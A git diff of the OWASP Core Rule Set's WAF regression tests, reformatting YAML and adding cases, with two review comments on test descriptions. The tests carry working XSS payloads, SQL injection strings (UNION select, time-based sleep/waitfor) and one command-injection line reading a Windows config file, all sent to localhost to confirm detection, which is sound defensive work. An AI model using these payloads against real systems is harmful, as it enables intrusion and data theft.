uri: '/?xss=%5B%20%20%5D%20.%20%2F%2A%2A%2F%20sort%20.%20call%20%60%20%24%7B%20alert%20%7D%201337%20%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-4 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%5D.map.call%60%24%7Beval%7D%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + 
log_contains: id "941400" + - test_title: 941400-5 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-6 + desc: "JavaScript function without parentheses" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60' + version: HTTP/1.1 + output: + log_contains: id "941400" + - test_title: 941400-7 + desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/?test=Reflect.sort.call%60%60' + version: HTTP/1.1 + output: + log_contains: id "941400" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 7e8337545e..7127cc95f0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml 
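Review bot: Tests 941400-1 through 941400-6 all carry the identical `desc: "JavaScript function without parentheses"`, so a failure report does not say which variant regressed. Each payload exercises something different (whitespace padding between tokens, a `/**/` comment between tokens, `map.call` with a unicode-escaped callee, `Reflect.apply.call`), and the desc should name that, e.g. `desc: "JavaScript function without parentheses, spaces between tokens"` for 941400-2 and `desc: "JavaScript function without parentheses, comment block between tokens"` for 941400-3. The `Status Page Test` prefix on 941400-7 is not used on any other test in this file; if tooling relies on it a short comment should say so, otherwise it should be dropped for consistency.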
@@ -1,245 +1,245 @@ --- - meta: - author: "Christian Folini" - description: Various SQL injection tests - enabled: true - name: 942100.yaml - tests: - - - test_title: 942100-1 +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942100.yaml +tests: + - test_title: 942100-1 desc: "Simple SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-2 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-3 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=-1839\x22 or \x221\x22=\x222" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-4 desc: "Basic SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-5 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-6 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-7 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-8 desc: "Simple SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-9 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-10 desc: "Advanced SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-11 desc: "Simple function call" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-12 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=unittests@coreruleset.org\x22 sleep(10.to_i) \x22" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-13 + - stage: + input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-13 desc: "Advanced injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22 | type %SystemDrive%\x5c\x5cconfig.ini | \x22" - version: HTTP/1.0 - output: - log_contains: id "942100" - - - test_title: 942100-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-14 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22unittests@coreruleset.org\x22'))\x20and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log_contains: id "942100" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 0b11a9bf05..8b685625a2 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml 
@@ -1,104 +1,183 @@ --- - meta: - author: "Christian Folini" - description: Various SQL injection tests - enabled: true - name: 942101.yaml - tests: - - - test_title: 942101-1 +meta: + author: "Christian Folini, Matteo Pace" + description: Various SQL injection tests + enabled: true + name: 942101.yaml +tests: + - test_title: 942101-1 desc: "Simple SQL Injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - - test_title: 942101-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/1234%20OR%201=1" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-2 desc: "Basic SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-3 desc: "Simple SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-4 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-5 desc: "Simple function call" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - - test_title: 942101-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-6 desc: "Advanced SQL injection" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/unittests@coreruleset.org\x22%20sleep(10.to_i)%20\x22" - version: HTTP/1.0 - output: - log_contains: id "942101" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: 
"/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-7 + desc: "SQL Injection at the last segment of the path (request_basename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-8 + desc: "SQL Injection inside the path (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-9 + desc: "SQL Injection inside the path with comment block (request_filename detection)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-10 + desc: "Negative test with incomplete SQL command inside the path" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/9'union+all/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" + - test_title: 942101-11 + desc: "Negative test with 
complete SQL command inside the path, but without comma" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml deleted file mode 100644 index c7e1182cbe..0000000000 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml +++ /dev/null @@ -1,24 +0,0 @@ ---- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942110.yaml - tests: - - - test_title: 942110-1 - desc: "Common SQL Injection Testing" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - # NB: false positives: /?var=\'\' - data: "var=%27%27" - version: HTTP/1.0 - output: - log_contains: id "942110" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index 4c07224612..b2cf47bcbb 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml 
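Review bot: The desc of 942101-11, `Negative test with complete SQL command inside the path, but without comma`, does not match its payload: the URI `/foo/24+union+all+select+1,2,3+from+aa/bar` still contains commas, and the only difference from the positive test 942101-8 is the missing single quote after `24`. Rename it so the boundary being pinned is stated accurately, e.g. `desc: "Negative test with complete SQL command inside the path, but without quote character"`. A one-line comment above 942101-10 and 942101-11 saying that they guard against false positives on paths that merely contain SQL keywords would also help whoever next adjusts the rule.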
@@ -1,363 +1,674 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942120.yaml - tests: - - - test_title: 942120-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942120.yaml +tests: + - test_title: 942120-1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ">>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<<" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%21%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "||" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "XOR" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "XOR" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80 + uri: "/" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "IS NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (0,1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + 
log_contains: id "942120" + - test_title: 942120-13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - - test_title: 942120-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "regexp" + version: HTTP/1.0 + output: + log_contains: id "942120" + 